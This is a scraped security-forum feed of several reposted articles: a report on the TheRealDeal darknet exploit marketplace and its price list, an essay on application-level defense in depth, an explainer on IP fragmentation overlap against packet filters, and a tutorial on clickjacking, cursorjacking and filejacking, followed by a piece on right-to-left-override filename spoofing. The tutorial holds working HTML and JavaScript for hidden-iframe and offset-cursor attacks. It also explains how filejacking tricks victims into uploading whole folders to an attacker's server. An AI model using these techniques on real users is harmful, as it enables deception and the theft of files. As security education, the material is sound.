already published, but are modified to be undetectable by defensive software. Figure – One-day private exploits The operators also offer one-day private exploits with known CVEs, but for which the code was never released. They also anticipated that a seller specialized in exploits for the GSM platform will soon offer a listing for some very interesting hardware. Who is behind TheRealDeal? The ‘deepdotweb’ website published an interview with one of the administrators of the black market who explained that the project is operated by four cyber experts with significant experience dealing in the “clearnet when it comes to zero-day exploit code, databases and so on.” The administrator explained that the greatest risk in commercializing zero-day exploits is that in the majority of cases, the code does not work or simply the sellers are scammers. Another factor that convicted the administrators to launch the TheRealDeal zero-day marketplace is the consideration that the places where it is possible to find the precious goods are not always easy to reach. There are some IRC servers that are not easy to find or that request an invitation. Differently, TheRealDeal wants to be an ‘open-market’ focused on zero-days. The four experts decided to launch the hidden service to create a marketplace where people can trade zero-day exploits without becoming a victim of fraud and while staying in total anonymity. “We started off by using BitWasp, fully aware of its history and flaws, but since we have years of hands-on experience in the security industry and not much in web-design we decided it would be a good platform since we can make our own security assessments and patches while the whole multi-sig seems to work perfect. We also wanted to avoid involving other people in the project for obvious reasons and that was another reason why not to hire a web designer etc… although we might hire one off the darknet soon, just to improve the UI a little,” said one of the administrators. Below is the list of products available on the TheRealDeal marketplace: 0-Day exploits (4) FUD Exploits (4) 1Day Private Exploits (1) Information (5) Money (36) Source Code (4) Spam (3) Accounts (7) Cards Other Tools (3) RATs (1) Hardware (2) Drugs Misc (6) Pharmacy (12) Cannabis (5) LSD (1) Shrooms (2) MDMA (6) Speed (5) Services (8) Weapons Hot (1) Cold (6) CNC Analyzing the product listing of TheRealDeal Market, it is possible to note the availability of zero-day exploits, which are source codes that could be used by hackers in cyber attacks, and of course any kind of hacking tool. The list is still short because the market is still in an embryonic stage, but the policy of its directors is clear. “Welcome…We originally opened this market in order to be a ‘code market’ — where rare information and code can be obtained,” a message from the website’s anonymous administrator reads. “Completely avoid the scam/scum and enjoy the real code, real information and real products.” Among the products there is a new method of hacking Apple iCloud accounts and exploit kits that could be used to compromise WordPress-based websites and both mobile and desktop OSs (i.e. Android and Windows). The price tag for the iCloud hack is $17,000, and as explained by the seller, it is possible to compromise any account. The buyer could pay in Bitcoin to make their identification difficult. “Any account can be accessed with a malicious request from a proxy account,” reads the description of the hack available on TheRealDeal marketplace. “Please arrange a demonstration using my service listing to hack an account of your choice.” Figure – Zero-day exploits The listing also includes an Internet Explorer attack that is offered for $8,000 in Bitcoin, as reported by Wired in a blog post: “Others include a technique to hack WordPress’ multisite configuration, an exploit against Android’s Webview stock browser, and an Internet Explorer attack that claims to work on Windows XP, Windows Vista and Windows 7, available for around $8,000 in bitcoin … Found 2 months ago by fuzzing,” the seller writes, referring to an automated method of testing a program against random samples of junk data to see when it crashes. “0day but might be exposed, can’t really tell without risking a lot of money,” the seller adds. “Willing to show a demo via the usual ways, message me but don’t waste my time!” The list of products has been recently updated. It also includes an exploit for the MS15-034 Microsoft IIS Remote Code Execution vulnerability, a flaw that is being actively exploited in the wild against Windows 7, 8, and 8.1, Windows Server 2008 R2, 2012, and 2012 R2. TheRealDeal market also offers other products very common in the criminal ecosystem, including drugs, weapons, and Remote Access Trojan (RAT). The operators also created a specific “services” category with the intent to attract high-profile black hats offering their hacking services (i.e. Email account takeover, DDoS services, data theft, hacking campaign). The Information category was created for sellers that offer any kind of information, documents, databases, secret keys, and similar products. TheRealDeal doesn’t implement a real escrow model; instead it adopts a multi-signature model to make any financial transaction effective. Basically, the buyer, the seller and the administrators control the amount of Bitcoin to transfer together, and any transaction needs the signature of two out of the three parties before funds are transferred. The administrators decided to implement multisig transactions because their marketplace is very young and without reputation. This means that people has no incentive to deposit a sum of money for something that they are not able to verify. It is curious to note that the marketplace also offers drugs due to high demand, but according to the administrators they might consider removing them in the future. There is also a “services” category – anything can go there, but we are hoping for some high quality blackhats to come forward and offer their services, anything from obtaining access to an email and getting a certain document and up to long term campaigns. The hardware category is for toys like fake cellular base stations and other physical ‘hacking’ tools. The information category is for any kind of information, documents, databases, secret keys, etc. In the following table are the principal product categories offered in the market and their prices. 0-Day exploits Apple id / iCloud remote exploit USD 17025,52 Internet Explorer <= 11 USD 7840,70 Android WebView 0day RCE USD 8176,73 WordPress MU RCE USD 1008,09 Category: FUD Exploits FUD .js download and execute USD 291,23 Adobe Flash < 16.0.0.296 (CVE-2015-0313) USD 560,05 Adobe Flash < 16.0.0.287 (CVE-2015-0311) USD 560,05 Category: 1Day Private Exploits MS15-034 Microsoft IIS Remote USD 42313,18 Category: Hardware A5/1 Encryption Rainbow Tables USD 67,21 Category: Source Code Banking malware source code USD 2,11 Alina POS malware full source code USD 0,92 Exploit Kits Source Code USD 1,82 “Start your own maket” code and server USD 7959,43 I’ll keep you updated on the evolution of the TheRealDeal marketplace in the next weeks. References http://securityaffairs.co/wordpress/36098/cyber-crime/therealdeal-black-marketplace-exploits.html http://www.wired.com/2015/04/therealdeal-zero-day-exploits/ http://securityaffairs.co/wordpress/14561/malware/zero-day-market-governments-main-buyers.html https://www.nsslabs.com/reports/known-unknowns-0 http://www.deepdotweb.com/2015/04/08/therealdeal-dark-net-market-for-code-0days-exploits/ Source
-
Defense in depth is dead. The way you’re thinking about data center security is outdated. Security started changing long before Sony, Target and the others got hacked. The problem starts with your perimeter. During a conversation with Pete Lindstrom of IDC, we paused to consider the state of defense in depth. “Circling wagons is just impossible,”Pete said. “With apps strewn across the internet, if a corporation thinks they can build perimeter around all their apps then they are nuts.” By expanding the definition of cloud computing to include cloud-based accounting, CRM, email services, and development tools, people discover that their organizations have been using cloud for years, without fully realizing it. In 2014, IDC reported that 69% of enterprises worldwide have at least one application or a portion of their computing infrastructure in the cloud. In Europe, adoption is also growing but at a slightly slower rate, with 19% of EU enterprises using cloud computing in 2014, according to the European Union‘s Eurostat. Bottom line: more enterprise data is living outside of the protected data center. When your definition of defense in depth is adding layers of security to the data center perimeter and physical data segmentation, modern cloud applications are indeed insecure. Instead, the enterprise should focus on the application, data, and user as the important security layers. In a 2015 report from Accenture and the Ponemon Institute, the authors note that proactive organizations are prioritizing network traffic anomalies, identifying vulnerabilities and limiting unauthorized data sharing, while the “static” companies focus on employees’ device security and data backup. Let’s examine the Sony Pictures hack. The Sony hackers gained access through former employees’ accounts, and easily cracked the perimeter. The real damage occurred once they exploited the weak internal network security. All the critical applications – email servers, accounting data, and copyrighted motion pictures – were all connected “on a wire” inside the corporate network. The perimeter-heavy, fortify-the-exterior approach to security is indeed dead. In fact, when it fails to stop cybercrime, this strategy can cost you upwards of $100M. Each enterprise application should be considered critical and deserves its own perimeter inside any network environment. With Sony, or any organization, critical data means all data. For a manufacturer, critical data might be product designs as well as the obvious accounting and customer data. Plus, nearly 85% of insider attacks or “privilege misuse” attacks used the target enterprises’ corporate local area network (LAN), according to a 2014 Verizon security report. To truly guard and protect an application, enterprises need to control all data and network traffic via secure, encrypted switches at every layer within a network. Defense shouldn’t end at the data center pediment, but extend down to each individual application. Monitored access, encryption, and application-specific firewall rules can all but eliminate malicious “east/west” movement inside a network. This approach to application-specific defense in depth continues the concept of physical segmentation into “application segmentation.” Each application owner within an organization can dictate how traffic flows to each application server through an encrypted network switch. When data passes through a secure application perimeter, application owners can easily monitor and isolate traffic and prevent unauthorized access. Even with only basic interior firewall rules, this enterprise can protect themselves from a Sony-style data exploit. Source
-
- application
- data
-
(and 3 more)
Tagged with:
-
1. Introduction The process of IP fragmentation occurs when the data of the network layer is too large to be transmitted over the data link layer in one piece. Then the data of the network layer is split into several pieces (fragments), and this process is called IP fragmentation. The intention of this article is to present how IP fragmentation could be used by the attacker to bypass packet filters (IP fragmentation overlapping attack). Finally, it is shown how this attack can be prevented by stateful inspection. 2. Understanding IP fragmentation Two layers of the OSI model are specially interesting when IP fragmentation is discussed – layer 3 (network) and layer 2 (data link). Data of the network layer is called a datagram and data of the data link layer is called a frame. From the data flow perspective – the datagram becomes included in the frame (encapsulation) and is sent to the receiver via the physical medium in the form of ones and zeros (physical layer – layer 1 of the OSI model). It may occur that the data of the network layer might be too large to be sent over the data link layer in one piece. Then it needs to be fragmented. How much data can be sent in one frame? It is defined by the MTU (Maximum Transmission Unit) – for example MTU is 1500 bytes for the Ethernet, which is commonly used at the data link layer. Let’s describe now how IP fragmentation actually works. We need some indication that the fragments belong to the specified datagram (please keep in mind that these fragments need to be reassembled later by the receiver). For this purpose the identification number is used – the same value is used for all fragments that are created as a result of the datagram’s fragmentation. These fragments need to be reassembled to the original datagram, but how should they be reassembled (order of fragments)? Offset is used for this purpose. How does the receiver know the number of fragments? Here the flag MF (More Fragments) is used. When MF flag is set, the system knows that the next fragment is expected. The last fragment is the one without MF flag. To summarize: the sender chooses the size of datagram that is not greater than the MTU of attached network medium and then the process of IP fragmentation is delegated to the routers, which connect different network media with different MTUs. There is also another approach to IP fragmentation – Path MTU Discovery. The idea is that the sender sends a probe datagram with DF (Don’t Fragment) flag set. If the router gets this probe datagram and sees that it is larger than the MTU of the attached network medium, then the problem occurs – the router has to fragment it, but the probe datagram is said not to be fragmented. Then the message about this problem is sent to the sender who interprets the answer and knows that the datagram needs to be smaller to avoid fragmentation on the way to the receiver. The sender wants to find out how large the datagram can be to avoid fragmentation by the routers. That’s why this process is called Path MTU Discovery and fragmentation in this approach is delegated to the sender. The problem with this approach is that the probe datagram might have been sent via different route than the next datagrams. As a consequence, it may turn out that the smallest MTU discovered by the sender is actually not the smallest one for the next datagrams, and the fragmentation done by routers will still be needed. What happens when the fragment is lost? The retransmission occurs when TCP is used at the layer 4 of the OSI model (transport layer). 3. IP Fragmentation Overlapping Let’s assume that the packet filter allows only the connections to port 80, but the attacker wants to connect to port 23. Although the packet filter is configured to block the connections to port 23, the attacker might try to use IP fragmentation overlapping to bypass the packet filter and finally connect to this port. This attack works as follows. The packet filter might be implemented in the way that the first fragment is checked according to the implemented rules – when the connection to port 80 is seen, the packet filter accepts this fragment and forwards it to the receiver. Moreover, the packet filter may assume that the next fragments just include the data, and this is not interesting from its point of view. As a consequence, the packet filter forwards the next fragments to the receiver. Recall at this point that the reassembling occurs when the fragments arrive to the receiver. The next fragment (as it has been said – forwarded by the packer filter) might have been specially prepared by the attacker – the carefully chosen offset has been used to overwrite the value of the destination port from the first fragment. The receiver waits for all fragments, reassembles them, and finally the connection to port of the attacker’s choice is established. The assumption here is that the packet filter looks at the first fragment that has all the necessary information to make a decision about forwarding or denying the fragment – the other fragments are assumed not to have interesting data (from packet filter’s point of view) and are just forwarded. How could we solve this problem? If the packet filter reassembled the fragments before making a decision (forward or deny), then the attacker would be stopped. As we can see this approach is about understanding the state or context of the traffic and is called stateful inspection (in contrast to the previously described packet filter that is stateless). 4. Summary IP fragmentation occurs when the data of the network layer is too large to be sent over the data link layer in one piece. It was presented how IP fragmentation can be used to bypass packet filter (IP fragmentation overlapping attack) and how stateful inspection can prevent this attack. Source
-
- data
- fragmentation
-
(and 3 more)
Tagged with:
-
Same origin bypasses using clickjacking Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. It is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, such as clicking on a button that appears to perform another function. The term “clickjacking” was coined by Jeremiah Grossman and Robert Hansen in 2008. Clickjacking can be understood as an instance of the confused deputy problem, a term used to describe when a computer is innocently fooled into misusing its authority [Wikipedia]. The clickjacking attack is a common security flaw, wherein a transparent iframe and customized CSS fool a user to click on an invisible object without knowing. The following code is an example of status update: <html> <head>Status Update</head> <body> <form name="updatestatus" action="javascript: alert('Status updated')" method="POST"> <input type="hidden" name="status" value="You are my hero, blah blah blah"> <input type="hidden" name="Anticsrftoken" value"jaklgbkj4wtfgfklsafghajfnmacdnwmrauf"> <input type="submit" name="twitter" value="Update here"> </form> </body> </html> Let’s have a look at the above mentioned code. In this example, a user will see a button “update here”, and once the user clicks on the button, a prompt will come up that says “status updated”. The real page would contain a URL where those user input values are sent. When the user clicks on the submit button, the user status is updated. To exploit this, the attacker needs to frame the vulnerable site into the transparent iframe. <html> <head> <style> iframe{ filter:alpha(opacity=0); opacity:0; position:absolute; top: 250px; left: 40px; height: 300px; width: 250px; } img{ position:absolute; top: 0px; left: 0px; height: 300px; width: 250px; } </style> </head> <body> <!-- The user sees the following image--> <img src<a href="http://httpsecure.org/wp-content/uploads/2014/06/CSRF-220x170.png">="http://httpsecure.org/wp-content/uploads/2014/06/CSRF-220x170.png</a>"> <!-- but he effectively clicks on the following framed content --> <iframe src<a href="http://httpsecure.org/uid">="http://httpsecure.org/ui</a>d=145496823/status.php"></iframe> </body> </html> In the above shown code, there is no visible presence of the frame content. This way, the user won’t see iframe content, instead he will see only the mentioned image. hidden frame, the user will only see the above mentioned image instead of the application’s real content. If the user clicks on the button, the hidden HTML form loads inside the iframe and send the value. This is a simplest example of how a user can be fooled into performing unwanted actions. Even if the application relies on an Anti-CSRF token, it does not impact the delivery of the clickjacking attack. This is because the resource to be framed is loaded normally and contains a valid Anti-CSRF token. Note: Clickjacking is the perfect example of bypassing Anti-CSRF token. The above mentioned example demonstrates what is clickjacking and how it is exploited. If you need the attack to take dynamic information such as mouse movement from the target, you can throw JavaScript into the code. This enables you to get exact x and y coordinates of the current mouse position. One clickjacking aim is to ensure your target mouse is always on top of the button, so the victim will click wherever you want. Rich Lundeen and Brendan Coles created a BeEF command module implementing this very technique. Now, you have two frames, one inner and other one is an outer iframe. The inner frame gets its position updated according to the current mouse cursor position, and outer iframe loads the target origin you want to exploit with the same attack. So, this way the mouse cursor is always wherever you want. The following code uses the JQuery API to dynamically update the position of the outer frame given the current mouse coordinates: $j("body").mousemove(function(e) { $j(outerObj).css('top', e.pageY); $j(outerObj).css('left', e.pageX); }); The inner iframe style uses the opacity trick to render an invisible element: filter:alpha(opacity=0); opacity:0; The clickjacking BeEF module with the preceding HTML as the inner iframe will send all clicks to the iframe. The iframe is following the mouse movements. So, wherever the user clicks on the page, they will be clicking the status update button. The iframe is reliably following the mouse movements. The cursor is still on top of the button. When the user decides to click somewhere, the click will trigger the onClick event of the button in the framed page. As you can see in the source page of the framed page, this will result in an Alert dialog. Same origin bypasses using cursorjacking This is typically similar to the clickjacking attack, however in this issue we will focus on the mouse cursor. Good examples of cursorjacking were demonstrated by Eddy Bordi and refined by Maruz Niemietz. Cursorjacking deceives users by means of a custom cursor image, where the pointer is displayed with an offset. The displayed cursor is shifted to the right from the actual mouse position. Let’s consider the following page: <html> <head> <style type="text/css"> #c { cursor:u<a href="http://localhost/basic_cursorjacking">rl("http://localhost/basic_cursorjacking</a> /new_cursor.png"),default; } #c input{ cursor:u<a href="http://localhost/basic_cursorjacking">rl("http://localhost/basic_cursorjacking</a> /new_cursor.png"),default; } </style> </head> <body> <h1>This is an example of CursorJacking. Click on the 'b' or 'd' buttons. </h1> <div id="c"> <input type="button" value="a" onclick="alert('clicked on a')"> <input type="button" value="b" onclick="alert('clicked on b')"> <br></br> <input type="button" value="c" onclick="alert('clicked on c')"> <input type="button" value="d" onclick="alert('clicked on d')"> </div> </body> </html> You can see the mouse cursor is changed with a custom image. This contains a mouse icon that is moved to static offset on the right. Clicking the second button results in clicking the first button. In the above example, the image background is visible, however, in a real case scenario the image would be a transparent background. When the user tries to click the B and D button in the page, he would actually be clicking the button on the left of the page. This new attack vector relies on completely hiding the cursor in the body of the page and adding the following style to the body element. <body style="cursor:none"> Let’s take another example. A different cursor image is then dynamically overlaid and is associated with mousemove events. The following code gives you a demo of this technique: <html> <head><title>Advanced cursorjacking by Kotowicz & Heiderich</title> <style> body,html {margin:0;padding:0} </style> </head> <body style="cursor:none;height: 1000px;"><img style="position: absolute;z-index:1000;" id=cursor src="cursor.png" /> <div style=margin-left:300px;"> <h1>Is this a good example of cursorjacking?</h1> </div> <button style="font-size: 150%;position:absolute;top:130px;left:630px;">YES</button> <button style="font-size: 150%;position:absolute;top:130px; left:680px;">NO</button> <div style="opacity:1;position:absolute;top:130px;left:30px;"> <a href="https://twitter.com/share" class="twitter-share-button" data-via="kkotowicz" data-size="small">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)) {js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/ widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document, "script","twitter-wjs");</script> </div> <script> function shake(n) { if (parent.moveBy) { for (i = 10; i > 0; i--) { for (j = n; j > 0; j--) { parent.moveBy(0,i); parent.moveBy(i,0); parent.moveBy(0,-i); parent.moveBy(-i,0); } } } } shake(5); var oNode = document.getElementById('cursor'); var onmove = function (e) { var nMoveX = e.clientX, nMoveY = e.clientY; oNode.style.left = (nMoveX + 600)+"px"; oNode.style.top = nMoveY + "px"; }; document.body.addEventListener('mousemove', onmove, true); </script> </body> </html> Note: Mentioned code written by Kotowicz & Heiderich In this example, the mouse cursor image is replaced with a custom image. Also, the event listener is then attached to the page body, listening for mousemove events. When the user’s mouse is moved, the event triggers the listener that results in the fake mouse cursor (the visible one) moving accordingly. Clicking the YES button results in clicking the Tweet button. This technique actually originally bypassed NoScript’s ClearClick Protection. Bypass same origin policy using filejacking Filejacking allow the extrusion of directory content from the target underlying Operating System to the attacker’s server through clever UI manipulation within the browser. This result is that under certain conditions, you can download files from the target server. In order to perform this attack successfully, first the target must use Chrome, because it’s the only browser which supports directory and webkitdirectory input attributes like the following. Second, the attack relies on baiting the victim into clicking somewhere, similar to the clickjacking attack. In this scenario, the input element presented is hidden behind a button element. Kotowicz published this attack in a research paper in 2011 after analyzing the impact of delivering filejacking attack to users baited with social engineering tricks. The filejacking attack depends on the target using the operating system’s “Choose Folder” dialog box when downloading a file from the web. To perform this attack, you should attempt to trick the user into selecting a directory containing sensitive files, for instance by employing authentic-looking phishing content that demonstrates what the target will see if they select the “Download to…” button. JavaScript code will enumerate the files in the directory with the directory input attribute, and then POST each of the files back to your server. In order to exploit filejacking, you can Google it and find server and client side code for the same. Input element should have their opacity set to 0, which will be covered by the visible button element. When the victim clicks the button, they are actually clicking the input element, assuming they need to select a download destination. When the victim clicks on the input element, a download destination is chosen and the onchange event on the input element is then triggered and the malicious function will execute. This results in enumerating the files contained in the selected download destination and formatting the content using the form data object, which is extruded with a cross-origin Post XMLHttpRequest. And the enumerated directory file is uploaded to the server. FYI The origin of the two previous snippets is different, which does not prevent the attack from exploiting. The file could be extruded from the target’s OS, SOP, powered browsers such as FIREFOX, CHROME and SAFARI. In cross-origin scenarios, the browser still sees the XMLHttpRequest, even through the response cannot be read. References http://en.wikipedia.org/wiki/Clickjacking https://browserhacker.com/ Source
- 1 reply
-
- button
- clickjacking
-
(and 3 more)
Tagged with:
-
In this article we will learn about the one of the most overlooked spoofing mechanisms, known as right to left override (RTLO). What is RTLO? RIGHT TO LEFT OVERRIDE is a Unicode mainly used for the writing and the reading of Arabic or Hebrew text. Unicode has a special character, U+202e, that tells computers to display the text that follows it in right-to-left order. This vulnerability is used to disguise the names of files and can be attached to the carrier like email. For example, the file name with ThisIsRTLOfileexe.doc is actually ThisIsRTLOfiledoc.exe, which is an executable file with a U+202e placed just before “doc.” Though some email applications and services that block executable files from being included in messages also block .exe programs that are obfuscated with this technique, unfortunately many mail applications don’t or can’t reliably scan archived and zipped documents, and the malicious files manipulated in this way are indeed being spammed out within zip archives. For example, let’s create a file with Name TestingRTLO[u+202E]xcod.txt. “U+202E” can be copied and pasted from the above character map present in Windows. To make sure something is present in the character, do the following steps: Create a new text document and see its properties and note down its name: Now rename the file with the copied U+202E characters and see the change in file name: Now rename the File TestingRTLO[u+202E]xcod.txt with characters inserted and see the below results. File extension types that can be dangerous The below section lists the common file types that can be used to execute unwanted code in the system: .bat .exe .cmd .com .lnk .pif .scr .vb .vbe .vbs .wsh Remediation against RTLO Though most endpoint security solutions like antivirus detect this type of spoofing, and some IRC clients even change the crafted malicious links back to original form, many mail applications don’t or can’t reliably scan archived and zipped documents, and the malicious files manipulated in this way are indeed being spammed out within zip archives. The biggest example of this is in the usage of the backdoor “Etumbot”. Some features of Windows also help to carry this type of attack, such as Windows hides the file extensions by default. Malicious individuals can set any icon they want for let’s say a .exe file. A file named pic.jpg.exe using the standard image icon will look like a harmless image with Windows’ default settings. Uncheck this selection and Windows will stop hiding extension for known file types. Another good approach is to make sure that the folder where all the downloads take place should have its view set to ‘content’. This will make sure that the files will appear in their original form despite all the changes. Though this technique is a bit old, it is still being used in backdoors like Etumbot, malware known as Sirefef, etc. Source